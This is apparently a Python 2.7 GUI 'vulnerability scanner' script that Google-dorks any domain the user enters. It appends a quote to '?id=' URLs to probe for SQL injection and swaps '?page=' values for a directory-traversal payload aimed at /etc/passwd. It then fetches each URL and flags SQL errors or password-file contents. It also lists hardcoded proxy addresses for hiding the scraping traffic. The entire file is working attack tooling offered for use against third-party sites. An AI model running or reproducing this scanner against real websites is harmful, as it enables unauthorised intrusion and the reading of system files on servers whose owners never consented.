# Python 2.7
# input type : url
########################
#       Coded By       #
#      Aarav Shah      #
########################


from Tkinter import *
import requests
from bs4 import BeautifulSoup
import re
import urllib
import ttk

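# callback() runs when the ">>>" button is pressed: it Google-dorks the
# target domain with "site:<domain>", writes candidate test URLs to
# <domain>.txt, then probes each URL for basic SQLi and LFI indicators.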
def callback():
    query = e.get()                 # target domain typed into the entry box
    num = value1.get()              # how many Google results to walk
    print num
    i = 0
    f = open(query + '.txt', 'w')   # open the results file
    http_proxy = "http://97.84.14.116:8080/"
    https_proxy = "http://12.33.254.195:3128/"

    proxyDict = {
        "http": http_proxy,
        "https": https_proxy
    }
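    # To route the scraping traffic through the proxies above, pass
    # proxies=proxyDict to the requests.get() call below; by default
    # the request goes out directly.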
    while i < num:                  # num = combobox drop-down value
        page = requests.get("http://www.google.com/search?q=site:" + query + "&start=" + str(i))
        soup = BeautifulSoup(page.content, 'html.parser')
        i = i + 10
        for link in soup.find_all("a", href=re.compile(r"(?<=/url\?q=)(htt.*://.*)")):
            # Google wraps each result as /url?q=<target>&...; unwrap it,
            # undo the percent-encoding, and strip list-repr artifacts.
            g = str(re.split(":(?=http)", link["href"].replace("/url?q=", "")))
            h = urllib.unquote(g)
            s = h.replace("[u'", "")
            l = s.replace("', u'", "\n")
            k = l.replace("https", "http")
            p = k.replace("']", "")
            head, sep, tail = p.partition('&')      # drop Google tracking params
            if 'webcache' not in head and 'site:' not in head:
                if '?id=' in head:
                    f.write(head + "'" + "\n")      # SQLi probe: append a quote
                if '?page' in head:
                    # LFI probe: replace the parameter value with a traversal payload
                    head, sep, tail = p.partition('=')
                    f.write(head + "=../../../../../../../../../../../../../../etc/passwd" + "\n")
    f.close()
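    # Re-read the saved URLs and probe each one: fetch the page and look
    # for vulnerability fingerprints in the response body.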
    f2 = open(query + '.txt', 'r')
    links = f2.readlines()
    words = ['sql', 'MySQL', 'SQL']         # SQL error fingerprints
    words2 = ['root', '/etc/', '/home/']    # /etc/passwd content fingerprints
    for link in links:
        link = link.strip()                 # drop the trailing newline
        if '?id=' in link:
            site = urllib.urlopen(link).read()
            flag = 0                        # set once, before the word loop,
            for word in words:              # so any single match keeps it set
                if word in site:
                    flag = 1
            if flag == 1:
                listbox.insert(END, "[SQLI] Vulnerability found at " + link)
        if '?page=' in link:
            site = urllib.urlopen(link).read()
            flag = 0
            for word2 in words2:
                if word2 in site:
                    flag = 1
            if flag == 1:
                listbox.insert(END, "[LFI] Vulnerability found at " + link)
    f2.close()
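
# Build the Tk GUI: an entry for the target domain, a results listbox,
# and a combobox selecting how many Google results to scan.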
master = Tk()
master.title('VULNERABILITY SCANNER')
e = Entry(master)
e.pack(fill=X)
w = Label(master, text=":.: Website Vulnerability Scanner Tool :.:", fg="blue", font="Helvetica -14 bold")
w.pack()
e.focus_set()
b = Button(master, text=">>>", width=10, command=callback, bg="black", fg="green")
b.pack()
listbox = Listbox(master, bg="black", fg="green", width=80)
listbox.pack()
value1 = IntVar()
drop = ttk.Combobox(master, textvariable=value1, width=5, state='readonly')
drop['values'] = ('10', '20', '30', '40', '50', '60', '70', '80', '90', '100')
drop.current(0)
drop.place(x=433, y=0)

mainloop()
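
# Usage (assuming this file is saved as scanner.py): run `python scanner.py`,
# type a target domain into the entry box, pick how many Google results to
# scan from the drop-down, and press ">>>".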